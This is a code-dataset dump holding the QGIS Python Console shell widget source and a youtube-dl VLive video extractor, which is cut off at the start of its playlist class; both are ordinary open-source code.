code
stringlengths 1
25.8M
| language
stringclasses 18
values | source
stringclasses 4
values | repo
stringclasses 78
values | path
stringlengths 0
268
|
|---|---|---|---|---|
# -*- coding:utf-8 -*-
"""
/***************************************************************************
Python Console for QGIS
-------------------
begin : 2012-09-10
copyright : (C) 2012 by Salvatore Larosa
email : lrssvtml (at) gmail (dot) com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
Some portions of code were taken from https://code.google.com/p/pydee/
"""
from qgis.PyQt.QtCore import Qt, QByteArray, QCoreApplication, QFile, QSize
from qgis.PyQt.QtWidgets import QDialog, QMenu, QShortcut, QApplication
from qgis.PyQt.QtGui import QColor, QKeySequence, QFont, QFontMetrics, QStandardItemModel, QStandardItem, QClipboard, QFontDatabase
from qgis.PyQt.Qsci import QsciScintilla, QsciLexerPython, QsciAPIs
import sys
import os
import code
import codecs
import re
import traceback
from qgis.core import QgsApplication, QgsSettings, Qgis
from .ui_console_history_dlg import Ui_HistoryDialogPythonConsole
_init_commands = ["import sys", "import os", "import re", "import math", "from qgis.core import *", "from qgis.gui import *", "from qgis.analysis import *", "import processing", "import qgis.utils",
"from qgis.utils import iface", "from qgis.PyQt.QtCore import *", "from qgis.PyQt.QtGui import *", "from qgis.PyQt.QtWidgets import *",
"from qgis.PyQt.QtNetwork import *", "from qgis.PyQt.QtXml import *"]
_historyFile = os.path.join(QgsApplication.qgisSettingsDirPath(), "console_history.txt")
class ShellScintilla(QsciScintilla, code.InteractiveInterpreter):
DEFAULT_COLOR = "#4d4d4c"
KEYWORD_COLOR = "#8959a8"
CLASS_COLOR = "#4271ae"
METHOD_COLOR = "#4271ae"
DECORATION_COLOR = "#3e999f"
NUMBER_COLOR = "#c82829"
COMMENT_COLOR = "#8e908c"
COMMENT_BLOCK_COLOR = "#8e908c"
BACKGROUND_COLOR = "#ffffff"
CURSOR_COLOR = "#636363"
CARET_LINE_COLOR = "#efefef"
SINGLE_QUOTE_COLOR = "#718c00"
DOUBLE_QUOTE_COLOR = "#718c00"
TRIPLE_SINGLE_QUOTE_COLOR = "#eab700"
TRIPLE_DOUBLE_QUOTE_COLOR = "#eab700"
MARGIN_BACKGROUND_COLOR = "#efefef"
MARGIN_FOREGROUND_COLOR = "#636363"
SELECTION_BACKGROUND_COLOR = "#d7d7d7"
SELECTION_FOREGROUND_COLOR = "#303030"
MATCHED_BRACE_BACKGROUND_COLOR = "#b7f907"
MATCHED_BRACE_FOREGROUND_COLOR = "#303030"
def __init__(self, parent=None):
super(ShellScintilla, self).__init__(parent)
code.InteractiveInterpreter.__init__(self, locals=None)
self.parent = parent
self.opening = ['(', '{', '[', "'", '"']
self.closing = [')', '}', ']', "'", '"']
self.settings = QgsSettings()
# Enable non-ascii chars for editor
self.setUtf8(True)
self.new_input_line = True
self.setMarginWidth(0, 0)
self.setMarginWidth(1, 0)
self.setMarginWidth(2, 0)
self.buffer = []
self.displayPrompt(False)
for line in _init_commands:
self.runsource(line)
self.history = []
self.historyIndex = 0
# Read history command file
self.readHistoryFile()
self.historyDlg = HistoryDialog(self)
# Brace matching: enable for a brace immediately before or after
# the current position
self.setBraceMatching(QsciScintilla.SloppyBraceMatch)
# Current line visible with special background color
self.setCaretWidth(2)
self.refreshSettingsShell()
# Don't want to see the horizontal scrollbar at all
# Use raw message to Scintilla here (all messages are documented
# here: http://www.scintilla.org/ScintillaDoc.html)
self.SendScintilla(QsciScintilla.SCI_SETHSCROLLBAR, 0)
# not too small
# self.setMinimumSize(500, 300)
self.setWrapMode(QsciScintilla.WrapCharacter)
self.SendScintilla(QsciScintilla.SCI_EMPTYUNDOBUFFER)
# Disable command key
ctrl, shift = self.SCMOD_CTRL << 16, self.SCMOD_SHIFT << 16
self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord('L') + ctrl)
self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord('T') + ctrl)
self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord('D') + ctrl)
self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord('Z') + ctrl)
self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord('Y') + ctrl)
self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord('L') + ctrl + shift)
# New QShortcut = ctrl+space/ctrl+alt+space for Autocomplete
self.newShortcutCSS = QShortcut(QKeySequence(Qt.CTRL + Qt.SHIFT + Qt.Key_Space), self)
self.newShortcutCAS = QShortcut(QKeySequence(Qt.CTRL + Qt.ALT + Qt.Key_Space), self)
self.newShortcutCSS.setContext(Qt.WidgetShortcut)
self.newShortcutCAS.setContext(Qt.WidgetShortcut)
self.newShortcutCAS.activated.connect(self.autoCompleteKeyBinding)
self.newShortcutCSS.activated.connect(self.showHistory)
def _setMinimumHeight(self):
font = self.lexer.defaultFont(0)
fm = QFontMetrics(font)
self.setMinimumHeight(fm.height() + 10)
def refreshSettingsShell(self):
# Set Python lexer
self.setLexers()
threshold = self.settings.value("pythonConsole/autoCompThreshold", 2, type=int)
self.setAutoCompletionThreshold(threshold)
radioButtonSource = self.settings.value("pythonConsole/autoCompleteSource", 'fromAPI')
autoCompEnabled = self.settings.value("pythonConsole/autoCompleteEnabled", True, type=bool)
if autoCompEnabled:
if radioButtonSource == 'fromDoc':
self.setAutoCompletionSource(self.AcsDocument)
elif radioButtonSource == 'fromAPI':
self.setAutoCompletionSource(self.AcsAPIs)
elif radioButtonSource == 'fromDocAPI':
self.setAutoCompletionSource(self.AcsAll)
else:
self.setAutoCompletionSource(self.AcsNone)
cursorColor = self.settings.value("pythonConsole/cursorColor", QColor(self.CURSOR_COLOR))
self.setCaretForegroundColor(cursorColor)
self.setSelectionForegroundColor(QColor(self.settings.value("pythonConsole/selectionForegroundColor", QColor(self.SELECTION_FOREGROUND_COLOR))))
self.setSelectionBackgroundColor(QColor(self.settings.value("pythonConsole/selectionBackgroundColor", QColor(self.SELECTION_BACKGROUND_COLOR))))
self.setMatchedBraceBackgroundColor(QColor(self.settings.value("pythonConsole/matchedBraceBackgroundColor", QColor(self.MATCHED_BRACE_BACKGROUND_COLOR))))
self.setMatchedBraceForegroundColor(QColor(self.settings.value("pythonConsole/matchedBraceForegroundColor", QColor(self.MATCHED_BRACE_FOREGROUND_COLOR))))
# Sets minimum height for input area based of font metric
self._setMinimumHeight()
def showHistory(self):
if not self.historyDlg.isVisible():
self.historyDlg.show()
self.historyDlg._reloadHistory()
self.historyDlg.activateWindow()
def autoCompleteKeyBinding(self):
radioButtonSource = self.settings.value("pythonConsole/autoCompleteSource", 'fromAPI')
autoCompEnabled = self.settings.value("pythonConsole/autoCompleteEnabled", True, type=bool)
if autoCompEnabled:
if radioButtonSource == 'fromDoc':
self.autoCompleteFromDocument()
elif radioButtonSource == 'fromAPI':
self.autoCompleteFromAPIs()
elif radioButtonSource == 'fromDocAPI':
self.autoCompleteFromAll()
def commandConsole(self, commands):
if not self.is_cursor_on_last_line():
self.move_cursor_to_end()
line, pos = self.getCursorPosition()
selCmdLength = len(self.text(line))
self.setSelection(line, 4, line, selCmdLength)
self.removeSelectedText()
for cmd in commands:
self.append(cmd)
self.entered()
self.move_cursor_to_end()
self.setFocus()
def setLexers(self):
self.lexer = QsciLexerPython()
font = QFontDatabase.systemFont(QFontDatabase.FixedFont)
loadFont = self.settings.value("pythonConsole/fontfamilytext")
if loadFont:
font.setFamily(loadFont)
fontSize = self.settings.value("pythonConsole/fontsize", type=int)
if fontSize:
font.setPointSize(fontSize)
self.lexer.setDefaultFont(font)
self.lexer.setDefaultColor(QColor(self.settings.value("pythonConsole/defaultFontColor", QColor(self.DEFAULT_COLOR))))
self.lexer.setColor(QColor(self.settings.value("pythonConsole/commentFontColor", QColor(self.COMMENT_COLOR))), 1)
self.lexer.setColor(QColor(self.settings.value("pythonConsole/numberFontColor", QColor(self.NUMBER_COLOR))), 2)
self.lexer.setColor(QColor(self.settings.value("pythonConsole/keywordFontColor", QColor(self.KEYWORD_COLOR))), 5)
self.lexer.setColor(QColor(self.settings.value("pythonConsole/classFontColor", QColor(self.CLASS_COLOR))), 8)
self.lexer.setColor(QColor(self.settings.value("pythonConsole/methodFontColor", QColor(self.METHOD_COLOR))), 9)
self.lexer.setColor(QColor(self.settings.value("pythonConsole/decorFontColor", QColor(self.DECORATION_COLOR))), 15)
self.lexer.setColor(QColor(self.settings.value("pythonConsole/commentBlockFontColor", QColor(self.COMMENT_BLOCK_COLOR))), 12)
self.lexer.setColor(QColor(self.settings.value("pythonConsole/singleQuoteFontColor", QColor(self.SINGLE_QUOTE_COLOR))), 4)
self.lexer.setColor(QColor(self.settings.value("pythonConsole/doubleQuoteFontColor", QColor(self.DOUBLE_QUOTE_COLOR))), 3)
self.lexer.setColor(QColor(self.settings.value("pythonConsole/tripleSingleQuoteFontColor", QColor(self.TRIPLE_SINGLE_QUOTE_COLOR))), 6)
self.lexer.setColor(QColor(self.settings.value("pythonConsole/tripleDoubleQuoteFontColor", QColor(self.TRIPLE_DOUBLE_QUOTE_COLOR))), 7)
self.lexer.setColor(QColor(self.settings.value("pythonConsole/defaultFontColorEditor", QColor(self.DEFAULT_COLOR))), 13)
self.lexer.setFont(font, 1)
self.lexer.setFont(font, 3)
self.lexer.setFont(font, 4)
self.lexer.setFont(font, QsciLexerPython.UnclosedString)
for style in range(0, 33):
paperColor = QColor(self.settings.value("pythonConsole/paperBackgroundColor", QColor(self.BACKGROUND_COLOR)))
self.lexer.setPaper(paperColor, style)
self.api = QsciAPIs(self.lexer)
checkBoxAPI = self.settings.value("pythonConsole/preloadAPI", True, type=bool)
checkBoxPreparedAPI = self.settings.value("pythonConsole/usePreparedAPIFile", False, type=bool)
if checkBoxAPI:
pap = os.path.join(QgsApplication.pkgDataPath(), "python", "qsci_apis", "pyqgis.pap")
self.api.loadPrepared(pap)
elif checkBoxPreparedAPI:
self.api.loadPrepared(self.settings.value("pythonConsole/preparedAPIFile"))
else:
apiPath = self.settings.value("pythonConsole/userAPI", [])
for i in range(0, len(apiPath)):
self.api.load(apiPath[i])
self.api.prepare()
self.lexer.setAPIs(self.api)
self.setLexer(self.lexer)
# TODO: show completion list for file and directory
def getText(self):
""" Get the text as a unicode string. """
value = self.getBytes().decode('utf-8')
# print (value) printing can give an error because the console font
# may not have all unicode characters
return value
def getBytes(self):
""" Get the text as bytes (utf-8 encoded). This is how
the data is stored internally. """
len = self.SendScintilla(self.SCI_GETLENGTH) + 1
bb = QByteArray(len, '0')
self.SendScintilla(self.SCI_GETTEXT, len, bb)
return bytes(bb)[:-1]
def getTextLength(self):
return self.SendScintilla(QsciScintilla.SCI_GETLENGTH)
def get_end_pos(self):
"""Return (line, index) position of the last character"""
line = self.lines() - 1
return line, len(self.text(line))
def is_cursor_at_end(self):
"""Return True if cursor is at the end of text"""
cline, cindex = self.getCursorPosition()
return (cline, cindex) == self.get_end_pos()
def move_cursor_to_end(self):
"""Move cursor to end of text"""
line, index = self.get_end_pos()
self.setCursorPosition(line, index)
self.ensureCursorVisible()
self.ensureLineVisible(line)
def is_cursor_on_last_line(self):
"""Return True if cursor is on the last line"""
cline, _ = self.getCursorPosition()
return cline == self.lines() - 1
def is_cursor_on_edition_zone(self):
""" Return True if the cursor is in the edition zone """
cline, cindex = self.getCursorPosition()
return cline == self.lines() - 1 and cindex >= 4
def new_prompt(self, prompt):
"""
Print a new prompt and save its (line, index) position
"""
self.write(prompt, prompt=True)
# now we update our cursor giving end of prompt
line, index = self.getCursorPosition()
self.ensureCursorVisible()
self.ensureLineVisible(line)
def displayPrompt(self, more=False):
self.append("... ") if more else self.append(">>> ")
self.move_cursor_to_end()
def updateHistory(self, command):
if isinstance(command, list):
for line in command:
self.history.append(line)
elif not command == "":
if len(self.history) <= 0 or \
command != self.history[-1]:
self.history.append(command)
self.historyIndex = len(self.history)
def writeHistoryFile(self, fromCloseConsole=False):
ok = False
try:
wH = codecs.open(_historyFile, 'w', encoding='utf-8')
for s in self.history:
wH.write(s + '\n')
ok = True
except:
raise
wH.close()
if ok and not fromCloseConsole:
msgText = QCoreApplication.translate('PythonConsole',
'History saved successfully.')
self.parent.callWidgetMessageBar(msgText)
def readHistoryFile(self):
fileExist = QFile.exists(_historyFile)
if fileExist:
with codecs.open(_historyFile, 'r', encoding='utf-8') as rH:
for line in rH:
if line != "\n":
l = line.rstrip('\n')
self.updateHistory(l)
else:
return
def clearHistory(self, clearSession=False):
if clearSession:
self.history = []
msgText = QCoreApplication.translate('PythonConsole',
'Session and file history cleared successfully.')
self.parent.callWidgetMessageBar(msgText)
return
ok = False
try:
cH = codecs.open(_historyFile, 'w', encoding='utf-8')
ok = True
except:
raise
cH.close()
if ok:
msgText = QCoreApplication.translate('PythonConsole',
'History cleared successfully.')
self.parent.callWidgetMessageBar(msgText)
def clearHistorySession(self):
self.clearHistory(True)
def showPrevious(self):
if self.historyIndex < len(self.history) and self.history:
line, pos = self.getCursorPosition()
selCmdLength = len(self.text(line))
self.setSelection(line, 4, line, selCmdLength)
self.removeSelectedText()
self.historyIndex += 1
if self.historyIndex == len(self.history):
self.insert("")
pass
else:
self.insert(self.history[self.historyIndex])
self.move_cursor_to_end()
#self.SendScintilla(QsciScintilla.SCI_DELETEBACK)
def showNext(self):
if self.historyIndex > 0 and self.history:
line, pos = self.getCursorPosition()
selCmdLength = len(self.text(line))
self.setSelection(line, 4, line, selCmdLength)
self.removeSelectedText()
self.historyIndex -= 1
if self.historyIndex == len(self.history):
self.insert("")
else:
self.insert(self.history[self.historyIndex])
self.move_cursor_to_end()
#self.SendScintilla(QsciScintilla.SCI_DELETEBACK)
def keyPressEvent(self, e):
startLine, startPos, endLine, endPos = self.getSelection()
# handle invalid cursor position and multiline selections
if not self.is_cursor_on_edition_zone() or startLine < endLine:
# allow copying and selecting
if e.modifiers() & (Qt.ControlModifier | Qt.MetaModifier):
if e.key() == Qt.Key_C:
# only catch and return from Ctrl-C here if there's a selection
if self.hasSelectedText():
QsciScintilla.keyPressEvent(self, e)
return
elif e.key() == Qt.Key_A:
QsciScintilla.keyPressEvent(self, e)
return
else:
return
# allow selection
if e.modifiers() & Qt.ShiftModifier:
if e.key() in (Qt.Key_Left, Qt.Key_Right, Qt.Key_Home, Qt.Key_End):
QsciScintilla.keyPressEvent(self, e)
return
# all other keystrokes get sent to the input line
self.move_cursor_to_end()
if e.modifiers() & (Qt.ControlModifier | Qt.MetaModifier) and e.key() == Qt.Key_C and not self.hasSelectedText():
# keyboard interrupt
sys.stdout.fire_keyboard_interrupt = True
return
line, index = self.getCursorPosition()
cmd = self.text(line)
if e.key() in (Qt.Key_Return, Qt.Key_Enter) and not self.isListActive():
self.entered()
elif e.key() in (Qt.Key_Left, Qt.Key_Home):
QsciScintilla.keyPressEvent(self, e)
# check whether the cursor is moved out of the edition zone
newline, newindex = self.getCursorPosition()
if newline < line or newindex < 4:
# fix selection and the cursor position
if self.hasSelectedText():
self.setSelection(line, self.getSelection()[3], line, 4)
else:
self.setCursorPosition(line, 4)
elif e.key() in (Qt.Key_Backspace, Qt.Key_Delete):
QsciScintilla.keyPressEvent(self, e)
# check whether the cursor is moved out of the edition zone
_, newindex = self.getCursorPosition()
if newindex < 4:
# restore the prompt chars (if removed) and
# fix the cursor position
self.insert(cmd[:3 - newindex] + " ")
self.setCursorPosition(line, 4)
self.recolor()
elif (e.modifiers() & (Qt.ControlModifier | Qt.MetaModifier) and e.key() == Qt.Key_V) or \
(e.modifiers() & Qt.ShiftModifier and e.key() == Qt.Key_Insert):
self.paste()
e.accept()
elif e.key() == Qt.Key_Down and not self.isListActive():
self.showPrevious()
elif e.key() == Qt.Key_Up and not self.isListActive():
self.showNext()
# TODO: press event for auto-completion file directory
else:
t = e.text()
self.autoCloseBracket = self.settings.value("pythonConsole/autoCloseBracket", False, type=bool)
self.autoImport = self.settings.value("pythonConsole/autoInsertionImport", True, type=bool)
txt = cmd[:index].replace('>>> ', '').replace('... ', '')
# Close bracket automatically
if t in self.opening and self.autoCloseBracket:
i = self.opening.index(t)
if self.hasSelectedText() and startPos != 0:
selText = self.selectedText()
self.removeSelectedText()
self.insert(self.opening[i] + selText + self.closing[i])
self.setCursorPosition(endLine, endPos + 2)
return
elif t == '(' and (re.match(r'^[ \t]*def \w+$', txt) or
re.match(r'^[ \t]*class \w+$', txt)):
self.insert('):')
else:
self.insert(self.closing[i])
# FIXES #8392 (automatically removes the redundant char
# when autoclosing brackets option is enabled)
elif t in [')', ']', '}'] and self.autoCloseBracket:
txt = self.text(line)
try:
if txt[index - 1] in self.opening and t == txt[index]:
self.setCursorPosition(line, index + 1)
self.SendScintilla(QsciScintilla.SCI_DELETEBACK)
except IndexError:
pass
elif t == ' ' and self.autoImport:
ptrn = r'^[ \t]*from [\w.]+$'
if re.match(ptrn, txt):
self.insert(' import')
self.setCursorPosition(line, index + 7)
QsciScintilla.keyPressEvent(self, e)
def contextMenuEvent(self, e):
menu = QMenu(self)
subMenu = QMenu(menu)
titleHistoryMenu = QCoreApplication.translate("PythonConsole", "Command History")
subMenu.setTitle(titleHistoryMenu)
subMenu.addAction(
QCoreApplication.translate("PythonConsole", "Show"),
self.showHistory, 'Ctrl+Shift+SPACE')
subMenu.addAction(
QCoreApplication.translate("PythonConsole", "Clear File"),
self.clearHistory)
subMenu.addAction(
QCoreApplication.translate("PythonConsole", "Clear Session"),
self.clearHistorySession)
menu.addMenu(subMenu)
menu.addSeparator()
copyAction = menu.addAction(
QCoreApplication.translate("PythonConsole", "Copy"),
self.copy, QKeySequence.Copy)
pasteAction = menu.addAction(
QCoreApplication.translate("PythonConsole", "Paste"),
self.paste, QKeySequence.Paste)
copyAction.setEnabled(False)
pasteAction.setEnabled(False)
if self.hasSelectedText():
copyAction.setEnabled(True)
if QApplication.clipboard().text():
pasteAction.setEnabled(True)
menu.exec_(self.mapToGlobal(e.pos()))
def mousePressEvent(self, e):
"""
Re-implemented to handle the mouse press event.
e: the mouse press event (QMouseEvent)
"""
self.setFocus()
if e.button() == Qt.MidButton:
stringSel = QApplication.clipboard().text(QClipboard.Selection)
if not self.is_cursor_on_last_line():
self.move_cursor_to_end()
self.insertFromDropPaste(stringSel)
e.accept()
else:
QsciScintilla.mousePressEvent(self, e)
def paste(self):
"""
Method to display data from the clipboard.
XXX: It should reimplement the virtual QScintilla.paste method,
but it seems not used by QScintilla code.
"""
stringPaste = QApplication.clipboard().text()
if self.is_cursor_on_last_line():
if self.hasSelectedText():
self.removeSelectedText()
else:
self.move_cursor_to_end()
self.insertFromDropPaste(stringPaste)
# Drag and drop
def dropEvent(self, e):
if e.mimeData().hasText():
stringDrag = e.mimeData().text()
self.insertFromDropPaste(stringDrag)
self.setFocus()
e.setDropAction(Qt.CopyAction)
e.accept()
else:
QsciScintilla.dropEvent(self, e)
def insertFromDropPaste(self, textDP):
pasteList = textDP.splitlines()
if pasteList:
for line in pasteList[:-1]:
cleanLine = line.replace(">>> ", "").replace("... ", "")
self.insert(cleanLine)
self.move_cursor_to_end()
self.runCommand(self.currentCommand())
if pasteList[-1] != "":
line = pasteList[-1]
cleanLine = line.replace(">>> ", "").replace("... ", "")
curpos = self.getCursorPosition()
self.insert(cleanLine)
self.setCursorPosition(curpos[0], curpos[1] + len(cleanLine))
def insertTextFromFile(self, listOpenFile):
for line in listOpenFile[:-1]:
self.append(line)
self.move_cursor_to_end()
self.SendScintilla(QsciScintilla.SCI_DELETEBACK)
self.runCommand(self.currentCommand())
self.append(listOpenFile[-1])
self.move_cursor_to_end()
self.SendScintilla(QsciScintilla.SCI_DELETEBACK)
def entered(self):
self.move_cursor_to_end()
self.runCommand(self.currentCommand())
self.setFocus()
self.move_cursor_to_end()
def currentCommand(self):
linenr, index = self.getCursorPosition()
string = self.text()
cmdLine = string[4:]
cmd = cmdLine
return cmd
def runCommand(self, cmd):
self.writeCMD(cmd)
import webbrowser
self.updateHistory(cmd)
version = 'master' if 'master' in Qgis.QGIS_VERSION.lower() else re.findall(r'^\d.[0-9]*', Qgis.QGIS_VERSION)[0]
if cmd in ('_pyqgis', '_api', '_cookbook'):
if cmd == '_pyqgis':
webbrowser.open("https://qgis.org/pyqgis/{}".format(version))
elif cmd == '_api':
webbrowser.open("https://qgis.org/api/{}".format('' if version == 'master' else version))
elif cmd == '_cookbook':
webbrowser.open("https://docs.qgis.org/{}/en/docs/pyqgis_developer_cookbook/".format(
'testing' if version == 'master' else version))
more = False
else:
self.buffer.append(cmd)
src = "\n".join(self.buffer)
more = self.runsource(src)
if not more:
self.buffer = []
# prevents to commands with more lines to break the console
# in the case they have a eol different from '\n'
self.setText('')
self.move_cursor_to_end()
self.displayPrompt(more)
def write(self, txt):
sys.stderr.write(txt)
def writeCMD(self, txt):
if sys.stdout:
sys.stdout.fire_keyboard_interrupt = False
if len(txt) > 0:
getCmdString = self.text()
prompt = getCmdString[0:4]
sys.stdout.write(prompt + txt + '\n')
def runsource(self, source, filename='<input>', symbol='single'):
if sys.stdout:
sys.stdout.fire_keyboard_interrupt = False
hook = sys.excepthook
try:
def excepthook(etype, value, tb):
self.write("".join(traceback.format_exception(etype, value, tb)))
sys.excepthook = excepthook
return super(ShellScintilla, self).runsource(source, filename, symbol)
finally:
sys.excepthook = hook
class HistoryDialog(QDialog, Ui_HistoryDialogPythonConsole):
def __init__(self, parent):
QDialog.__init__(self, parent)
self.setupUi(self)
self.parent = parent
self.setWindowTitle(QCoreApplication.translate("PythonConsole",
"Python Console - Command History"))
self.listView.setToolTip(QCoreApplication.translate("PythonConsole",
"Double-click on item to execute"))
self.model = QStandardItemModel(self.listView)
self._reloadHistory()
self.deleteScut = QShortcut(QKeySequence(Qt.Key_Delete), self)
self.deleteScut.activated.connect(self._deleteItem)
self.listView.doubleClicked.connect(self._runHistory)
self.reloadHistory.clicked.connect(self._reloadHistory)
self.saveHistory.clicked.connect(self._saveHistory)
def _runHistory(self, item):
cmd = item.data(Qt.DisplayRole)
self.parent.runCommand(cmd)
def _saveHistory(self):
self.parent.writeHistoryFile(True)
def _reloadHistory(self):
self.model.clear()
for i in self.parent.history:
item = QStandardItem(i)
if sys.platform.startswith('win'):
item.setSizeHint(QSize(18, 18))
self.model.appendRow(item)
self.listView.setModel(self.model)
self.listView.scrollToBottom()
def _deleteItem(self):
itemsSelected = self.listView.selectionModel().selectedIndexes()
if itemsSelected:
item = itemsSelected[0].row()
# Remove item from the command history (just for the current session)
self.parent.history.pop(item)
self.parent.historyIndex -= 1
# Remove row from the command history dialog
self.model.removeRow(item)
|
unknown
|
codeparrot/codeparrot-clean
| ||
# coding: utf-8
from __future__ import unicode_literals
import re
import time
import itertools
from .common import InfoExtractor
from ..compat import (
compat_urllib_parse_urlencode,
compat_str,
)
from ..utils import (
dict_get,
ExtractorError,
float_or_none,
int_or_none,
remove_start,
try_get,
urlencode_postdata,
)
class VLiveIE(InfoExtractor):
IE_NAME = 'vlive'
_VALID_URL = r'https?://(?:(?:www|m)\.)?vlive\.tv/video/(?P<id>[0-9]+)'
_TESTS = [{
'url': 'http://www.vlive.tv/video/1326',
'md5': 'cc7314812855ce56de70a06a27314983',
'info_dict': {
'id': '1326',
'ext': 'mp4',
'title': "[V LIVE] Girl's Day's Broadcast",
'creator': "Girl's Day",
'view_count': int,
},
}, {
'url': 'http://www.vlive.tv/video/16937',
'info_dict': {
'id': '16937',
'ext': 'mp4',
'title': '[V LIVE] 첸백시 걍방',
'creator': 'EXO',
'view_count': int,
'subtitles': 'mincount:12',
},
'params': {
'skip_download': True,
},
}]
@classmethod
def suitable(cls, url):
return False if VLivePlaylistIE.suitable(url) else super(VLiveIE, cls).suitable(url)
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(
'http://www.vlive.tv/video/%s' % video_id, video_id)
VIDEO_PARAMS_RE = r'\bvlive\.video\.init\(([^)]+)'
VIDEO_PARAMS_FIELD = 'video params'
params = self._parse_json(self._search_regex(
VIDEO_PARAMS_RE, webpage, VIDEO_PARAMS_FIELD, default=''), video_id,
transform_source=lambda s: '[' + s + ']', fatal=False)
if not params or len(params) < 7:
params = self._search_regex(
VIDEO_PARAMS_RE, webpage, VIDEO_PARAMS_FIELD)
params = [p.strip(r'"') for p in re.split(r'\s*,\s*', params)]
status, long_video_id, key = params[2], params[5], params[6]
status = remove_start(status, 'PRODUCT_')
if status in ('LIVE_ON_AIR', 'BIG_EVENT_ON_AIR'):
return self._live(video_id, webpage)
elif status in ('VOD_ON_AIR', 'BIG_EVENT_INTRO'):
if long_video_id and key:
return self._replay(video_id, webpage, long_video_id, key)
else:
status = 'COMING_SOON'
if status == 'LIVE_END':
raise ExtractorError('Uploading for replay. Please wait...',
expected=True)
elif status == 'COMING_SOON':
raise ExtractorError('Coming soon!', expected=True)
elif status == 'CANCELED':
raise ExtractorError('We are sorry, '
'but the live broadcast has been canceled.',
expected=True)
else:
raise ExtractorError('Unknown status %s' % status)
def _get_common_fields(self, webpage):
title = self._og_search_title(webpage)
creator = self._html_search_regex(
r'<div[^>]+class="info_area"[^>]*>\s*<a\s+[^>]*>([^<]+)',
webpage, 'creator', fatal=False)
thumbnail = self._og_search_thumbnail(webpage)
return {
'title': title,
'creator': creator,
'thumbnail': thumbnail,
}
def _live(self, video_id, webpage):
init_page = self._download_webpage(
'http://www.vlive.tv/video/init/view',
video_id, note='Downloading live webpage',
data=urlencode_postdata({'videoSeq': video_id}),
headers={
'Referer': 'http://www.vlive.tv/video/%s' % video_id,
'Content-Type': 'application/x-www-form-urlencoded'
})
live_params = self._search_regex(
r'"liveStreamInfo"\s*:\s*(".*"),',
init_page, 'live stream info')
live_params = self._parse_json(live_params, video_id)
live_params = self._parse_json(live_params, video_id)
formats = []
for vid in live_params.get('resolutions', []):
formats.extend(self._extract_m3u8_formats(
vid['cdnUrl'], video_id, 'mp4',
m3u8_id=vid.get('name'),
fatal=False, live=True))
self._sort_formats(formats)
info = self._get_common_fields(webpage)
info.update({
'title': self._live_title(info['title']),
'id': video_id,
'formats': formats,
'is_live': True,
})
return info
def _replay(self, video_id, webpage, long_video_id, key):
playinfo = self._download_json(
'http://global.apis.naver.com/rmcnmv/rmcnmv/vod_play_videoInfo.json?%s'
% compat_urllib_parse_urlencode({
'videoId': long_video_id,
'key': key,
'ptc': 'http',
'doct': 'json', # document type (xml or json)
'cpt': 'vtt', # captions type (vtt or ttml)
}), video_id)
formats = [{
'url': vid['source'],
'format_id': vid.get('encodingOption', {}).get('name'),
'abr': float_or_none(vid.get('bitrate', {}).get('audio')),
'vbr': float_or_none(vid.get('bitrate', {}).get('video')),
'width': int_or_none(vid.get('encodingOption', {}).get('width')),
'height': int_or_none(vid.get('encodingOption', {}).get('height')),
'filesize': int_or_none(vid.get('size')),
} for vid in playinfo.get('videos', {}).get('list', []) if vid.get('source')]
self._sort_formats(formats)
view_count = int_or_none(playinfo.get('meta', {}).get('count'))
subtitles = {}
for caption in playinfo.get('captions', {}).get('list', []):
lang = dict_get(caption, ('locale', 'language', 'country', 'label'))
if lang and caption.get('source'):
subtitles[lang] = [{
'ext': 'vtt',
'url': caption['source']}]
info = self._get_common_fields(webpage)
info.update({
'id': video_id,
'formats': formats,
'view_count': view_count,
'subtitles': subtitles,
})
return info
class VLiveChannelIE(InfoExtractor):
IE_NAME = 'vlive:channel'
_VALID_URL = r'https?://channels\.vlive\.tv/(?P<id>[0-9A-Z]+)'
_TEST = {
'url': 'http://channels.vlive.tv/FCD4B',
'info_dict': {
'id': 'FCD4B',
'title': 'MAMAMOO',
},
'playlist_mincount': 110
}
_APP_ID = '8c6cc7b45d2568fb668be6e05b6e5a3b'
def _real_extract(self, url):
channel_code = self._match_id(url)
webpage = self._download_webpage(
'http://channels.vlive.tv/%s/video' % channel_code, channel_code)
app_id = None
app_js_url = self._search_regex(
r'<script[^>]+src=(["\'])(?P<url>http.+?/app\.js.*?)\1',
webpage, 'app js', default=None, group='url')
if app_js_url:
app_js = self._download_webpage(
app_js_url, channel_code, 'Downloading app JS', fatal=False)
if app_js:
app_id = self._search_regex(
r'Global\.VFAN_APP_ID\s*=\s*[\'"]([^\'"]+)[\'"]',
app_js, 'app id', default=None)
app_id = app_id or self._APP_ID
channel_info = self._download_json(
'http://api.vfan.vlive.tv/vproxy/channelplus/decodeChannelCode',
channel_code, note='Downloading decode channel code',
query={
'app_id': app_id,
'channelCode': channel_code,
'_': int(time.time())
})
channel_seq = channel_info['result']['channelSeq']
channel_name = None
entries = []
for page_num in itertools.count(1):
video_list = self._download_json(
'http://api.vfan.vlive.tv/vproxy/channelplus/getChannelVideoList',
channel_code, note='Downloading channel list page #%d' % page_num,
query={
'app_id': app_id,
'channelSeq': channel_seq,
# Large values of maxNumOfRows (~300 or above) may cause
# empty responses (see [1]), e.g. this happens for [2] that
# has more than 300 videos.
# 1. https://github.com/rg3/youtube-dl/issues/13830
# 2. http://channels.vlive.tv/EDBF.
'maxNumOfRows': 100,
'_': int(time.time()),
'pageNo': page_num
}
)
if not channel_name:
channel_name = try_get(
video_list,
lambda x: x['result']['channelInfo']['channelName'],
compat_str)
videos = try_get(
video_list, lambda x: x['result']['videoList'], list)
if not videos:
break
for video in videos:
video_id = video.get('videoSeq')
if not video_id:
continue
video_id = compat_str(video_id)
entries.append(
self.url_result(
'http://www.vlive.tv/video/%s' % video_id,
ie=VLiveIE.ie_key(), video_id=video_id))
return self.playlist_result(
entries, channel_code, channel_name)
class VLivePlaylistIE(InfoExtractor):
IE_NAME = 'vlive:playlist'
